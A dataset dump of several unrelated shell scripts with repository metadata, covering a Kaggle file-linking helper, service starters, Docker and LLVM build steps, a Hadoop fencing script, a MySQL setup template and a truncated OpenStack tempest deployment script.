|
0d123d6f6bcacb11aa6c25c149940edb3bf40851
|
Shell
|
chrishefele/kaggle-sample-code
|
/Malware/src/mk_train_small.sh
|
UTF-8
| 227
| 2.6875
| 3
|
[] |
no_license
|
# Link a fixed subset of the training files (names starting with 3, c or H)
# into the train_small directory as symlinks.
SRC=/home/chefele/kaggle/Malware/download/train
DST=/home/chefele/kaggle/Malware/data/train_small
# BUGFIX: abort if the destination is missing — the original continued after a
# failed cd and would have created the links in the current directory instead.
cd "${DST}" || exit 1
pwd
for f in ${SRC}/3*.* ${SRC}/c*.* ${SRC}/H*.*
do
    ln --verbose --symbolic "${f}" "$(basename "${f}")"
done
pwd
|
b332f765cc654f21c1ce413fbde5138ff710a5ba
|
Shell
|
GamesCreatorsClub/GCC-Rover
|
/pyros/linux-service/start-pyros
|
UTF-8
| 393
| 3.21875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Start the PyROS daemon; expected to be invoked by the init/service wrapper
# (hence the special-case handling of a "stop" argument when the binary is gone).
BINARY=/home/pi/pyros/pyros-core.py
test -x $BINARY || { echo "$BINARY not avaible";
	if [ "$1" = "stop" ]; then exit 0;
	else exit 5; fi; }
echo -n "Starting PyROS daemon... "
mkdir -p /home/pi/pyros/code
mkdir -p /home/pi/pyros/logs
chown pi /home/pi/pyros/code
chown pi /home/pi/pyros/logs
cd /home/pi/pyros || exit 1
# BUGFIX: redirect stdout to the log FIRST, then duplicate stderr onto it.
# The original order ('2>&1 >file') pointed stderr at the terminal, so Python
# tracebacks never reached the log file.
python3 -u $BINARY >/home/pi/pyros/logs/pyros.log 2>&1
| true
|
d277d58c7f490053c4ae694b2419f753b525b1db
|
Shell
|
ShantNarkizian/Distributed-sharded-kvstore
|
/multi_docker_script.sh
|
UTF-8
| 330
| 2.546875
| 3
|
[] |
no_license
|
docker build -t assignment4-image .
# Tear down any leftover containers from a previous run.
for i in {1..8};
do docker kill node$i;
docker kill replica$i; done
docker system prune -f
docker network create --subnet=10.10.0.0/16 assignment4-net
# Launch each replica script in its own terminal window.
# NOTE(review): 'open -a Terminal.app' is macOS-only; the commented
# gnome-terminal line is the Linux equivalent.
for filename in replicascripts/replica*.sh;
do
echo $filename
open -a Terminal.app $filename
#gnome-terminal -- $filename
done
| true
|
f553fe4a5af9727b073af60a71334db4f48de0ca
|
Shell
|
louishust/hadoop_fence
|
/q_namenode.sh
|
UTF-8
| 1,552
| 3.9375
| 4
|
[] |
no_license
|
#!/bin/bash
# Print invocation help and abort with status 1.
usage(){
    printf 'Usage: %s hostname port\n' "$0"
    printf 'Note: hostname can not be ip\n'
    exit 1
}
# Return 0 when $1 is a dotted-quad IPv4 address (four 1-3 digit octets,
# each at most 255); return non-zero otherwise.
function valid_ip()
{
    local candidate=$1
    # Shape check first: exactly four digit groups separated by dots.
    [[ $candidate =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]] || return 1
    local o1 o2 o3 o4
    IFS='.' read -r o1 o2 o3 o4 <<< "$candidate"
    # Range check: every octet must fit in 0-255.
    [[ $o1 -le 255 && $o2 -le 255 && $o3 -le 255 && $o4 -le 255 ]]
}
# invoke usage
# call usage() function if filename not supplied
[[ $# -ne 2 ]] && usage
host=$1
port=$2
# Fence configuration: ZooKeeper hosts to fence through and the ssh user.
# NOTE(review): all three zkhosts entries are "ubuntu" — presumably
# placeholders; confirm before deployment.
zkhosts=("ubuntu" "ubuntu" "ubuntu")
username="hadoop"
CONN_TIMEOUT=5
# check hostname
# The first argument must be a hostname, not a raw IPv4 address.
if valid_ip $1; then
usage
fi
unreached_hosts=0
# Fan out: ask every ZooKeeper host, in parallel, to run the fence script.
for element in "${zkhosts[@]}"; do
echo "try to connect $element to execute fence!"
ssh -o ConnectTimeout=$CONN_TIMEOUT $username@$element "q_datanode.sh $host $port" &
done
# wait the jobs
# BUGFIX: capture each job's exit status immediately after 'wait'. The
# original tested $? AFTER the echo, so every branch saw echo's status
# (always 0) and the non-zero branches were unreachable.
for job in $(jobs -p)
do
wait $job
rc=$?
echo "ssh datanode return $rc"
if [ $rc -eq 0 ]; then
let "unreached_hosts+=1"
elif [ $rc -eq 2 ]; then
echo "Can not ssh to datanode, ret = 2!"
elif [ $rc -eq 1 ]; then
exit 0
elif [ $rc -eq 3 ]; then
exit 1
elif [ $rc -eq 255 ]; then
echo "Can not ssh to datanode, ret= 255!"
fi
done
zknum=${#zkhosts[@]}
let qurom=zknum/2
# Quorum check: fencing succeeds only if more than half of the ZooKeeper
# hosts reported killing the active namenode.
echo "$unreached_hosts zks kill the active namenode successfully!"
if [ $unreached_hosts -gt $qurom ];then
echo "Fence successfully!"
exit 0
else
echo "Not enough zks kill the active namenode!"
exit 1
fi
| true
|
077c2055f0e246c588d75ce098257c51b31bf1f0
|
Shell
|
adliano/LinuxSystemAdminProjects
|
/Project2/getopthelp
|
UTF-8
| 263
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
# getopts demo: -a and -b take an argument, -c and -d are plain flags.
# The leading ':' in the optstring enables silent error reporting via the
# ':' and '?' cases below.
opts=":a:b:cd"
while getopts $opts arg; do
	case $arg in
		a) echo $OPTARG;;
		b) echo $OPTARG;;
		# BUGFIX: the original echoed $OPTIN, which is undefined (always
		# empty). $OPTIND — the index of the next argument to process —
		# was presumably intended; confirm against the exercise statement.
		c) echo $OPTIND ;;
		d) echo "option d";;
		?) echo "invalid option -$OPTARG";;
		:) echo "missing argumet";;
	esac
done
| true
|
4547f81583b6abff4f4bc3f71f3df4576b8cd9aa
|
Shell
|
lupanh/phenominer
|
/phenominer-nlp/src/app/nlptools_webservice.sh
|
UTF-8
| 881
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
################################################################################
# #
# Script run NLP tools webservice (BLLIP, GENIA, Ontologies annotator) #
# Copyright (C) 2014 Mai-Vu Tran <vutranmai@gmail.com> #
# #
################################################################################
# template
Date="24/05/2014"
Version="0.0.1"
Author="Mai-Vu Tran (vutranmai@gmail.com)"
### Functions ###
### Main ###
OS=`uname`
APP_HOME="."
LIB="$APP_HOME/lib";
# NOTE(review): $JAVA_DIR is expected to be set in the environment — confirm.
CLASSPATH="$JAVA_DIR/lib/tools.jar"
CLASSPATH=${CLASSPATH}:$LIB/*;
CLASS='org.nii.phenominer.nlp.app.NLPToolsWebService'
JAVA_OPTS="-server -XX:+UseParallelGC -Xshare:auto -Xms1g -Xmx4g"
# exec replaces this shell with the JVM, so the 'exit 0' below only runs
# if exec itself fails.
exec java $JAVA_OPTS -cp $CLASSPATH $CLASS "$@"
exit 0
| true
|
e95da5834c7e94896d0958717d922d5800e11467
|
Shell
|
patlegris/ConfPHP-1
|
/install.example.sh
|
UTF-8
| 562
| 3.03125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Template: fill in the credentials below before running.
ROOT_NAME=
ROOT_PASSWORD=
USER_NAME=
USER_PASSWORD=
DBNAME=
HOST=
SQL=$(cat<<EOF
DROP DATABASE IF EXISTS $DBNAME;
CREATE DATABASE $DBNAME DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;
DELETE FROM mysql.user WHERE user='$USER_NAME' AND host='$USER_NAME';
GRANT ALL PRIVILEGES ON $DBNAME.* to '$USER_NAME'@'$HOST' IDENTIFIED BY '$USER_PASSWORD' WITH GRANT OPTION;
EOF
)
# NOTE(review): the DELETE uses host='$USER_NAME' — possibly meant '$HOST'; confirm.
# SECURITY FIX: pipe the statements straight into mysql instead of writing them
# (including the user password) to a world-readable temp file in the cwd.
printf '%s\n' "$SQL" | mysql -u"$ROOT_NAME" -p"$ROOT_PASSWORD"
# php artisan make:migration create_student_table --create=students
# php artisan migrate:refresh --seed
| true
|
c07443ebde51899d16f46a28e68c4c3102dc61ba
|
Shell
|
donaldraymond/crystallography-scripts
|
/makemap.sh
|
UTF-8
| 6,198
| 3.984375
| 4
|
[] |
no_license
|
#!/bin/bash
#######################################################
# This is a script to create ccp4 maps for O, PyMOL or COOT
#written by Donald Raymond
last_update="June 15 2015"
#######################################################
#for debugging
#set -x
#check if sftools and fft are installed
# 'hash' probes the command lookup table; non-zero status means not found.
if hash sftools 2>/dev/null && hash fft 2>/dev/null; then
echo -e "\nFound sftools and fft...continuing with script"
else
echo -e "\nThis script requires sftools and fft\n"
exit 1
fi
#clear screen
clear
###############################
#
# Functions
#
###############################
#function to run sftools
# Feeds the global $mtzfile to sftools (read/complete/list) and tees the
# listing to sftoolsread.txt for later column-label parsing.
function read_mtz {
#read file in sftools
sftools <<EOF | tee sftoolsread.txt
read $mtzfile
complete
list
end
yes
EOF
}
#function to make map 1:input file 2:output file 3:low res 4:high res 5:F 6:phase
# Runs fft to compute the map, normalizes it to sigma scale with mapmask, and
# (when the global $format is dn6) converts it via sftools, removing the ccp4.
function make_map {
fft HKLIN $1 MAPOUT $2.ccp4 << eof > /dev/null
xyzlim asu
resolution $3 $4
GRID SAMPLE 6.0
labin F1=$5 PHI=$6
end
eof
# normalize the map
mapmask mapin $2.ccp4 mapout $2.ccp4 << EOF > /dev/null
SCALE SIGMA
EOF
if [[ $format = dn6 ]]; then
sftools << EOF > /dev/null
mapin $2.ccp4 map
mapout $2.dn6
quit
end
EOF
#delete temp files.
rm $2.ccp4
fi
}
#Function to query user
# Prompt ($1) and read single keypresses until one matches the class in $2;
# returns 0 if it is in $3 ("yes" set) and 1 if in $4 ("no" set).
# NOTE(review): if read hits EOF before a matching key, retval is never set
# and 'return $retval' falls back to the status of the preceding echo — confirm
# this edge case is acceptable for non-interactive use.
function askuser {
echo;echo -n "$1 "
while read -r -n 1 -s answer; do
if [[ $answer = [$2] ]]; then
[[ $answer = [$3] ]] && retval=0
[[ $answer = [$4] ]] && retval=1
break
fi
done
echo
return $retval
}
#function to check for custom F and P
# Verify that a column of type $1 with label $2 appears in the sftools
# listing (sftoolsread.txt); abort the whole script when it is absent.
function check_cus {
    if ! grep -q "$1\s*$2" sftoolsread.txt; then
        echo -e "\nDid not find $2\n"
        exit 1
    fi
    echo -e "\nFound $2\n"
}
# Echo purpose of script
echo -e "\n"
echo -e "*********************************************************************"
echo -e
echo -e "This is a script to produce CCP4 maps for viewing in O, PyMOL or COOT"
echo -e
echo -e "Updated on $last_update by Donald Raymond (Steve Harrison Lab)"
echo -e
echo -e "*********************************************************************"
#check if user specified an mtz file
for arg in "$@"; do
	if [[ "$arg" = *.mtz ]]; then
		mtzfile="$arg"
	fi
done
#get mtz file if none specified
if [[ -z "$mtzfile" ]]; then
	echo -e "\nMTZs in current directory: `ls -m *.mtz 2>/dev/null` \n"
	read -p "Load MTZ file: " mtzfile
	while [ ! -f "$mtzfile" ]; do
		echo
		read -p "I need a valid MTZ file: " mtzfile
	done
	echo -e "\nFound $mtzfile"
fi
#default format is ccp4
format=ccp4
#check for dsn6
# NOTE(review): getopts stops at the first non-option argument, so '-d' is
# only recognised when it precedes the mtz filename — confirm intended.
while getopts ":d" opt; do
	case $opt in
		d) echo -e "\n Making DSN6 map(s)\n"
		format=dn6
		;;
		\?) echo "Invalid option: -$OPTARG" >&2
		;;
	esac
done
echo -e "\nRunning sftools"
read_mtz
#Find map coefficients
echo -e "\nFinding map coefficients\n"
if $(grep -q FDM sftoolsread.txt); then
echo -e "\tDM map coefficients found\n"
map_coef=FDM
elif $(grep -q FEM sftoolsread.txt); then
echo -e "\tFEM map coefficients found\n"
map_coef=FEM
elif $(grep -q 'parrot.F_phi.F' sftoolsread.txt); then
echo -e "\tParrot map coefficients found\n"
map_coef=PARROT
elif $(grep -q FWT sftoolsread.txt) && $(grep -q DELFWT sftoolsread.txt); then
echo -e "\t2FoFc and FoFc map coefficients found\n"
map_coef=F_DELWT
elif $(grep -q FWT sftoolsread.txt); then
echo -e "\tmap coefficients found\n"
map_coef=FWT
elif $(grep -q PH2FOFCWT sftoolsread.txt) && $(grep -q PHFOFCWT sftoolsread.txt); then
echo -e "\t2FoFc and FoFc map coefficients found\n"
map_coef=2FO
elif $(grep -q PH2FOFCWT sftoolsread.txt) && ! $(grep -q PHFOFCWT sftoolsread.txt); then
echo -e "\t2FoFc map coefficients found\n"
map_coef=2FO_only
else
#ask about custom F and P
if askuser "Unknown coefficients...use custom F and P? (Y/N): " YyNn Yy Nn; then
echo; read -p "Label of amplitude column: " amp
check_cus F "$amp"
read -p "Lable of phase column: " pha
check_cus P "$pha"
map_coef=custom
else
echo -e "\nTerminating script\n"
exit 1
fi
fi
#get the resolution
echo -e "Getting resolution limits"
res_low="`awk '/The resolution range in the data base is/ {print $9}' sftoolsread.txt`"
echo -e "\n\tLow resolution limit is $res_low"
reso_high="`awk '/The resolution range in the data base is/ {print $11}' sftoolsread.txt`"
echo -e "\n\tHigh resolution limit is $reso_high\n"
#get space group name
spaceGroupName="`awk '/Initializing CHKHKL for spacegroup/ {print $5}' sftoolsread.txt`"
echo -e "The space group is $spaceGroupName \n"
#Ask user about lower resolution map
read -p "Resolution of map? [$reso_high] " res_high
while [[ -z "$res_high" ]] ; do
res_high=$reso_high
done
#Ask user for map prefix
echo
read -p "Prefix for output map file [map]: " mapName
while [[ -z $mapName ]];do
mapName=map
done
#make map
echo -e "\nMaking and normalizing map(s)"
case $map_coef in
F_DELWT) make_map $mtzfile $mapName-2FoFc $res_low $res_high FWT PHWT
make_map $mtzfile $mapName-FoFc $res_low $res_high DELFWT PHDELWT
echo -e "\n\tCreated $mapName-2FoFc.$format and $mapName-FoFc.$format"
;;
FDM) make_map $mtzfile $mapName-DM $res_low $res_high FDM PHIDM
echo -e "\n\tCreated $mapName-DM.$format"
;;
FEM) make_map $mtzfile $mapName-FEM $res_low $res_high FEM PHIFEM
echo -e "\n\tCreated $mapName-FEM.$format"
;;
PARROT) make_map $mtzfile $mapName-parrot $res_low $res_high 'parrot.F_phi.F' 'parrot.F_phi.phi'
echo -e "\n\tCreated $mapName-parrot.$format"
;;
FWT) make_map $mtzfile $mapName $res_low $res_high FWT PHWT
echo -e "\n\tCreated $mapName.$format"
;;
2FO) make_map $mtzfile $mapName-2FoFc $res_low $res_high 2FOFCWT PH2FOFCWT
make_map $mtzfile $mapName-FoFc $res_low $res_high FOFCWT PHFOFCWT
echo -e "\n\tCreated $mapName-2FoFc.$format and $mapName-FoFc.$format"
;;
2FO_only) make_map $mtzfile $mapName-2FoFc $res_low $res_high 2FOFCWT PH2FOFCWT
echo -e "\n\tCreated $mapName-2FoFc.$format"
;;
custom) make_map $mtzfile $mapName $res_low $res_high $amp $pha
echo -e "\n\tCreated $mapName.$format"
;;
*) echo -e "\nUnknow map coefficients labels"
echo -e "Please send MTZ to raymond@crystal.harvard.edu to update script"
;;
esac
rm -rf sftoolsread.txt 2> /dev/null
#Finish script
echo -e "\nScript finished\n"
| true
|
f3f53b0204b425272566a05941f144bc4e8e0f43
|
Shell
|
justuswang/rocm_umd_build_script
|
/build_llvm.sh
|
UTF-8
| 840
| 3.203125
| 3
|
[] |
no_license
|
#!/bin/bash
ROCM_ROOT_DIR=/data/rocm
if [ ! -z "$1" ]
then
ROCM_ROOT_DIR="$1"
fi
[ -d "${ROCM_ROOT_DIR}/llvm/" ] || git clone --single-branch --recursive -b roc-hcc-2.9.x https://github.com/RadeonOpenCompute/llvm.git ${ROCM_ROOT_DIR}/llvm
[ -d "${ROCM_ROOT_DIR}/llvm/tools/clang" ] || git clone --single-branch --recursive -b roc-2.9.x https://github.com/RadeonOpenCompute/clang ${ROCM_ROOT_DIR}/llvm/tools/clang
[ -d "${ROCM_ROOT_DIR}/llvm/tools/lld" ] || git clone --single-branch --recursive -b roc-hcc-2.9.x https://github.com/RadeonOpenCompute/lld ${ROCM_ROOT_DIR}/llvm/tools/lld
echo "Build output to $ROCM_ROOT_DIR/umd_lib"
cd ${ROCM_ROOT_DIR}/llvm/
mkdir -p build && cd build
cmake -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=${ROCM_ROOT_DIR}/umd_lib/llvm -DLLVM_TARGETS_TO_BUILD="AMDGPU;X86" ..
make -j 8
make install
| true
|
a417cb18897c0c327cb22727d64eead5a9f7ed7f
|
Shell
|
Sinki25/PHP
|
/getSize.sh
|
UTF-8
| 496
| 3.25
| 3
|
[] |
no_license
|
#!bin/bash
dsize=0
format=''
format1=''
case "$2" in
Music)
format="mp3"
format1="ogg"
;;
Picture)
format="png"
format1="jpg"
;;
Script)
format="sh"
;;
Video)
format="mp4"
format1="avi"
;;
Text)
format="txt"
;;
esac
echo $(find $1 -type f -name *.$format1)
for j in $(find $1 -type f -name *.$format)
do
let dsize=dsize+$(stat -c%s $j)
done
for j in $(find $1 -type f -name *.$format1)
do
let dsize=dsize+$(stat -c%s $j)
done
echo "$dsize"
| true
|
79d5fea2f671f9fc016974913326767ad0094b96
|
Shell
|
openstack-archive/deb-openstack-meta-packages
|
/src/openstack-deploy-tempest
|
UTF-8
| 19,723
| 3.90625
| 4
|
[] |
no_license
|
#!/bin/sh
set -e
export PKGOS_VERBOSE=yes
OSINSTALL_RC=~/osinstallrc
TEMPEST_CONF=/etc/tempest/tempest.conf
# This can be debian or cirros. While it's cool
# to test using the Debian image, it's also a
# quite big image which needs flavor 2 (eg: the
# HDD needs more than 1 GB of space), and it
# takes a while to build it.
TEST_IMAGE_TYPE=cirros
if [ "${TEST_IMAGE_TYPE}" = "debian" ] ; then
IMAGE_PASS=SupArP4ss
else
IMAGE_PASS="cubswin:)"
fi
# Default value for parameters:
# Possible values: loopback, presetup
LVMTYPE=loopback
# Device on which we should setup LVM for Cinder use
OTCI_LVM_DEVICE=sda
# URL of the Debian repo to use to create the Debian
# openstack VM image (only useful if the above TEST_IMAGE_TYPE
# is set to debian).
DEBIAN_REPO_PARAM=" -u http://http.debian.net/debian -s http://http.debian.net/debian"
for i in $@ ; do
case "${1}" in
"--otci-lvmtype")
if [ -z "${2}" ] ; then echo "Parameter for option --lvmtype is missing" > /dev/stderr ; DO_EXIT="yes" ; fi
LVMTYPE="${2}"
shift
shift
;;
"--otci-lvm-device")
if [ -z "${2}" ] ; then echo "Parameter for option --lvmtype is missing" > /dev/stderr ; DO_EXIT="yes" ; fi
OTCI_LVM_DEVICE="${2}"
shift
shift
;;
"--otci-openstack-debian-images-deb-repo")
if [ -z "${2}" ] ; then echo "Parameter for option --otci-openstack-debian-images-deb-repo is missing" > /dev/stderr ; DO_EXIT="yes" ; fi
DEBIAN_REPO_PARAM=" -u ${2} -s ${2}"
shift
shift
;;
*)
;;
esac
done
if [ ${DO_EXIT} = "yes" ] ; then
echo "Parameters not validated: will exit now!" > /dev/stderr
exit 1
fi
####################
# INCLUDE OUR LIBS #
####################
if ! [ -r /usr/share/openstack-deploy/preseed-lib ] ; then
echo "Can't find /usr/share/openstack-deploy/pressed-lib: exiting"
exit 1
fi
. /usr/share/openstack-deploy/preseed-lib
if ! [ -r /usr/share/openstack-pkg-tools/pkgos_func ] ; then
echo "Can't find /usr/share/openstack-pkg-tools/pkgos_func: exiting"
exit 1
fi
. /usr/share/openstack-pkg-tools/pkgos_func
if ! [ -r /etc/default/openstack-proxy-node-network ] ; then
echo "Can't find /etc/default/openstack-proxy-node-network: exiting"
exit 1
fi
. /etc/default/openstack-proxy-node-network
if [ -r "${OSINSTALL_RC}" ] ; then
. ${OSINSTALL_RC}
else
echo "Cannot find ${OSINSTALL_RC}: exiting..."
exit 1
fi
if [ -r ~/openrc.sh ] ; then
. ~/openrc.sh
else
echo "Cannot find openrc.sh: exiting..."
exit 1
fi
#################################
# DEFINE SOME UTILITY FUNCTIONS #
#################################
osinstall_check_installed () {
local PKG_NAME
PKG_NAME=${1}
INSTALL_STRING=`dpkg -l ${PKG_NAME} | grep ^ii | awk '{print $2}'`
if [ "${INSTALL_STRING}" = ${PKG_NAME} ] ; then
return 0
else
return 1
fi
}
osinstall_install_if_not_installed () {
local PKG_NAME
PKG_NAME=${1}
if ! osinstall_check_installed ${PKG_NAME} ; then
DEBIAN_FRONTEND=noninteractive ${APTGET} install ${PKG_NAME}
fi
}
deploy_tempest_install_pkgs () {
echo "===> Installing tempest and openstack-debian-images"
osinstall_install_if_not_installed tempest
cp /usr/share/openstack-deploy/tempest_exclude.conf /etc/tempest/exclude.conf
osinstall_install_if_not_installed openstack-debian-images
osinstall_install_if_not_installed openstack-clients
}
build_and_upload_image () {
# Even if we don't use the Cirros image for tests, we need it
# because there's some Cinder tests that are expecting the image
# to be in there.
# Download the Cirros image
CIRROS_VERSION=0.3.1
mkdir -p /opt/stack/new/devstack/files/images/cirros-${CIRROS_VERSION}-x86_64-uec
wget http://download.cirros-cloud.net/${CIRROS_VERSION}/cirros-${CIRROS_VERSION}-x86_64-uec.tar.gz
tar -C /opt/stack/new/devstack/files/images/cirros-${CIRROS_VERSION}-x86_64-uec -xvzf cirros-${CIRROS_VERSION}-x86_64-uec.tar.gz
rm cirros-${CIRROS_VERSION}-x86_64-uec.tar.gz
AUTH_TOKEN=${RC_KEYSTONE_AUTHTOKEN}
if [ "${TEST_IMAGE_TYPE}" = debian ] ; then
echo "===> Creating Debian image"
build-openstack-debian-image -r jessie -p ${IMAGE_PASS} ${DEBIAN_REPO_PARAM}
IMAGE_PATH=`ls *.qcow2`
echo "===> Uploading image to Glance"
IMAGE_REF=`pkgos_get_id glance image-create --name foo --disk-format=qcow2 --container-format=bare --visibility public --file=${IMAGE_PATH}`
else
echo "===> Download the Cirros image"
IMAGE_PATH=/opt/stack/new/devstack/files/images/cirros-${CIRROS_VERSION}-x86_64-disk.img
wget http://download.cirros-cloud.net/${CIRROS_VERSION}/cirros-${CIRROS_VERSION}-x86_64-disk.img -O ${IMAGE_PATH}
IMAGE_REF=`pkgos_get_id glance image-create --name foo --disk-format=qcow2 --container-format=bare --visibility public --file=${IMAGE_PATH}`
fi
}
create_non_admin_keystone_user () {
openstack project create testme
openstack user create --password testme --project testme --email root@localhost --enable testme
openstack project create testme2
openstack user create --password testme2 --project testme2 --email root@localhost --enable testme2
}
fix_tempest_config () {
echo "===> Fixing tempest.conf"
# [identity]
pkgos_inifile set ${TEMPEST_CONF} identity uri http://${DEFROUTE_IP}:35357/v2.0
pkgos_inifile set ${TEMPEST_CONF} identity uri_v3 http://${DEFROUTE_IP}:35357/v3
# [application_catalog]
pkgos_inifile set ${TEMPEST_CONF} application_catalog region regionOne
# [auth]
pkgos_inifile set ${TEMPEST_CONF} auth admin_project_name admin
pkgos_inifile set ${TEMPEST_CONF} auth admin_password ${RC_KEYSTONE_ADMINPASS}
# [compute]
pkgos_inifile set ${TEMPEST_CONF} compute image_ref ${IMAGE_REF}
pkgos_inifile set ${TEMPEST_CONF} compute image_ref_alt ${IMAGE_REF}
if [ "${TEST_IMAGE_TYPE}" = debian ] ; then
pkgos_inifile set ${TEMPEST_CONF} validation image_ssh_user debian
else
pkgos_inifile set ${TEMPEST_CONF} validation image_ssh_user cirros
fi
pkgos_inifile set ${TEMPEST_CONF} validation image_ssh_password ${IMAGE_PASS}
pkgos_inifile set ${TEMPEST_CONF} validation network_for_ssh ext-net
pkgos_inifile set ${TEMPEST_CONF} compute fixed_network_name demo-net
pkgos_inifile set ${TEMPEST_CONF} compute-feature-enabled spice_console true
pkgos_inifile set ${TEMPEST_CONF} compute-feature-enabled allow_duplicate_networks true
# [dashboard]
pkgos_inifile set ${TEMPEST_CONF} dashboard dashboard_url http://${DEFROUTE_IP}/
# [network]
pkgos_inifile set ${TEMPEST_CONF} network tenant_network_cidr ${TENANT_NET_CIDR}
PUBLIC_NETWORK_ID=`pkgos_get_id neutron net-show ext-net`
pkgos_inifile set ${TEMPEST_CONF} network public_network_id ${PUBLIC_NETWORK_ID}
# We shouldn't do this. Doing it fails all tests
# PUBLIC_ROUTER_ID=`pkgos_get_id neutron router-show demo-router`
# pkgos_inifile set ${TEMPEST_CONF} network public_router_id ${PUBLIC_ROUTER_ID}
pkgos_inifile set ${TEMPEST_CONF} network default_network 192.168.64.0/20
pkgos_inifile set ${TEMPEST_CONF} network tenant_network_v6_cidr 2403:cc00:1000:8888:200:20ff:fe01:8402/64
# [orchestration]
pkgos_inifile set ${TEMPEST_CONF} orchestration instance_type m1.small
pkgos_inifile set ${TEMPEST_CONF} orchestration keypair_name odtkey
# [service_available]
# pkgos_inifile set ${TEMPEST_CONF} service_available zaqar false
pkgos_inifile set ${TEMPEST_CONF} service_available swift true
pkgos_inifile set ${TEMPEST_CONF} service_available ceilometer true
pkgos_inifile set ${TEMPEST_CONF} service_available horizon true
# pkgos_inifile set ${TEMPEST_CONF} service_available ironic false
pkgos_inifile set ${TEMPEST_CONF} service_available nova true
pkgos_inifile set ${TEMPEST_CONF} service_available cinder true
# pkgos_inifile set ${TEMPEST_CONF} service_available trove false
pkgos_inifile set ${TEMPEST_CONF} service_available heat true
pkgos_inifile set ${TEMPEST_CONF} service_available aodh true
# pkgos_inifile set ${TEMPEST_CONF} service_available sahara false
pkgos_inifile set ${TEMPEST_CONF} service_available glance true
pkgos_inifile set ${TEMPEST_CONF} service_available neutron true
}
gen_ssh_root_key () {
ssh-keygen -t rsa -N "" -f .ssh/id_rsa
nova keypair-add --pub-key .ssh/id_rsa.pub odtkey
}
setup_loopback_based_lvm_vg () {
echo "===> Creating a 40 GB loopback file used as LVM"
## Create a 10GB file on the root
#dd if=/dev/zero of=/lvm-data.dat count=20971520
# Create a 40GB file on the root
#dd if=/dev/zero of=/lvm-data.dat count=83886080 sparse
qemu-img create /lvm-data.dat 40G
# Setup the loopback device
losetup /dev/loop0 /lvm-data.dat
# Create the PV
pvcreate /dev/loop0
# Create the VG
vgcreate pkgosvg0 /dev/loop0
# Activate the pkgosvg0
vgchange -a y pkgosvg0
echo "Done!"
}
setup_real_hdd_based_lvm_vg () {
echo "===> Creating new volume group on device ${OTCI_LVM_DEVICE} (will destroy everything there...)"
parted /dev/${OTCI_LVM_DEVICE} mklabel msdos -s
parted /dev/${OTCI_LVM_DEVICE} mkpart primary ext4 -a optimal 2048 48G
parted /dev/${OTCI_LVM_DEVICE} set 1 lvm on
pvcreate /dev/${OTCI_LVM_DEVICE}1 -ff -y
vgcreate pkgosvg0 /dev/${OTCI_LVM_DEVICE}1
vgchange -a y pkgosvg0
echo "Done!"
}
setup_loopback_based_swift () {
### NOTE: this comes from http://docs.openstack.org/developer/swift/development_saio.html ###
echo "===> Installing Swift and xfsprogs"
DEBIAN_FRONTEND=noninteractive ${APTGET} install swift swift-proxy swift-account swift-container swift-object swift-object-expirer xfsprogs
if [ "${LVMTYPE}" = "loopback" ] ; then
echo "===> Creating swift HDDs using a 20 GB loopback file at /srv/swift-disk"
# Create the loopback device
mkdir -p /srv
qemu-img create /srv/swift-disk 20G
mkfs.xfs /srv/swift-disk
# Mount it
mkdir /mnt/sdb1
echo "/srv/swift-disk /mnt/sdb1 xfs loop,noatime,nodiratime,nobarrier,logbufs=8 0 0" >>/etc/fstab
mount /mnt/sdb1
elif [ "${LVMTYPE}" = "resetup" ] ; then
echo "===> Creating swift HDDs using a 48GB file on /dev/${OTCI_LVM_DEVICE}2"
mkdir -p /srv
# Create the partition and the FS
parted /dev/${OTCI_LVM_DEVICE} mkpart primary xfs -a optimal 48G 96G
sleep 5
mkfs.xfs /dev/${OTCI_LVM_DEVICE}2 -f
# Mount it
mkdir /mnt/sdb1
echo "/dev/${OTCI_LVM_DEVICE}2 /mnt/sdb1 xfs loop,noatime,nodiratime,nobarrier,logbufs=8 0 0" >>/etc/fstab
mount /mnt/sdb1
fi
echo "===> Configuring Swift & rsync"
# Setup swift disks
mkdir /mnt/sdb1/1 /mnt/sdb1/2 /mnt/sdb1/3 /mnt/sdb1/4
chown swift:swift /mnt/sdb1/*
for x in `seq 1 4`; do ln -s /mnt/sdb1/$x /srv/$x; done
mkdir -p /srv/1/node/sdb1 /srv/1/node/sdb5 \
/srv/2/node/sdb2 /srv/2/node/sdb6 \
/srv/3/node/sdb3 /srv/3/node/sdb7 \
/srv/4/node/sdb4 /srv/4/node/sdb8 \
/var/run/swift
chown -R swift:swift /var/run/swift
# **Make sure to include the trailing slash after /srv/$x/**
for x in `seq 1 4`; do chown -R swift:swift /srv/$x/; done
# Common Post-Device Setup
mkdir -p /var/cache/swift /var/cache/swift2 /var/cache/swift3 /var/cache/swift4
chown swift:swift /var/cache/swift*
# Enable rsyncd for swift
cp /usr/share/openstack-deploy/saio/rsyncd.conf /etc
sed -i s/RSYNC_ENABLE=false/RSYNC_ENABLE=true/ /etc/default/rsync
service rsync restart
# Copy the saio config files for swift
rm -rf /etc/swift/
mkdir -p /etc/swift/
cp -rfv /usr/share/openstack-deploy/saio/swift/* /etc/swift/
chown -R swift:swift /etc/swift
# Customize the config (ie: keystone authtoken)
pkgos_inifile set /etc/swift/proxy-server.conf filter:authtoken admin_password ${RC_KEYSTONE_ADMINPASS}
pkgos_inifile set /etc/swift/proxy-server.conf filter:authtoken identity_uri http://${DEFROUTE_IP}:35357/
pkgos_inifile set /etc/swift/proxy-server.conf filter:authtoken auth_uri http://${DEFROUTE_IP}:5000/
pkgos_inifile set /etc/swift/proxy-server.conf filter:authtoken auth_url http://${DEFROUTE_IP}:5000/
# Create the swift ring
chmod +x /usr/share/openstack-deploy/saio/bin/remakerings
/usr/share/openstack-deploy/saio/bin/remakerings
# Restart swift after the config is good
for i in `ls /etc/init.d/swift-*` ; do $i stop ; done
for i in `ls /etc/init.d/swift-*` ; do $i start ; done
echo "===> Creating swift endpoints in Keystone catalog"
# Setup the endpoint
openstack --os-identity-api-version=3 service create --description "OpenStack Object Storage" --name swift object-store
openstack --os-identity-api-version=3 endpoint create --region regionOne swift public http://${DEFROUTE_IP}:8080/v1/AUTH_%\(tenant_id\)s
